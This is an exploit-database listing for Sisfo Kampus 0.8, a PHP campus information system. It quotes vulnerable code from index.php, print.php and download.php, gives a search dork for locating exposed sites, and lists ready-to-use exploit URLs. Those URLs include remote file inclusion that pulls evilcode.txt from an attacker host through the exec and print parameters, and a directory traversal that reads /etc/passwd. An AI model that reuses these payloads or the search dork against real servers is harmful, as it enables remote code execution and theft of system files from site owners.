[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Sisfo Kampus <= 0.8 Remote File Inclusion / Download Vulnerabilities

Author
Wawan Firmansyah
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-1209
Category
web applications
Date add
25-11-2006
Platform
unsorted
====================================================================
Sisfo Kampus <= 0.8 Remote File Inclusion / Download Vulnerabilities
====================================================================



#       Source Code = Sisfokampus 0.8
#
#       Website = www.Sisfokampus.net
#
#       Author = E. Setio Dewo 
#
#       Dorkz : Allinurl: /index.php?exec=


#       File Vuln :     index.php
#                       print.php
#                       download.php ( Local File Include )
#
#       Found by :      Wawan Firmansyah a.k.a Ang|n


###############################################################################

# Source of index.php

       -------------------------[Line 27]-----------------------------
       <?php
          if ($exec=='main.php' && file_exists("$themedir/main.php"))
               include "$themedir/main.php";
               else include $exec;
       ?>
       -------------------------[Line 31]------------------------------

# Source Of print.php

       -------------------------[Line 15]------------------------------
       <?php
       include_once "sysfo/sysfo.common.php";

       if (isset($_REQUEST['print'])) {
       $print = $_REQUEST['print'];
       include "$print";
       }
       else die (DisplayHeader($fmtErrorMsg, $strNoDataTobePrint));

       include "disconnectdb.php";
       ?>
       -------------------------[Line 25]-------------------------------

# Source Of download.php

       -------------------------[Line 1]--------------------------------
       <?php
       DisplayHeader($fmtPageTitle, $strDownload);
       include "lib/file.common.php";
       if (isset($_REQUEST['dir'])) $dir = $_REQUEST['dir'];
       else $dir = $Download_dir;
       if (substr($dir, -1) != '/' && substr($dir, -1) != '\\') $dir = "$dir/";
       DisplayDownloadDir($dir);
       ?>
       -------------------------[Line 8]--------------------------------

##################################################################################

# Exploit of index.php

       http://www.victim.com/index.php?exec=http://attacker.com/evilcode.txt?

# Exploit of print.php
       http://www.victim.com/print.php?print=http://attacker.com/evilcode.txt?
       or
       http://www.victim.com/index.php?exec=print&print=http://attacker.com/evilcode.txt?

# Exploit of download.php

       http://www.victim.com/index.php?exec=download&dir=/etc/passwd

##################################################################################

Greatz :
       K-159 ( Thanks for ur Support & Advice )
       #cyberbox community in dal.net
       #indolinux in dal.net
       #edp in dal.net

##################################################################################



#  0day.today [2024-12-25]  #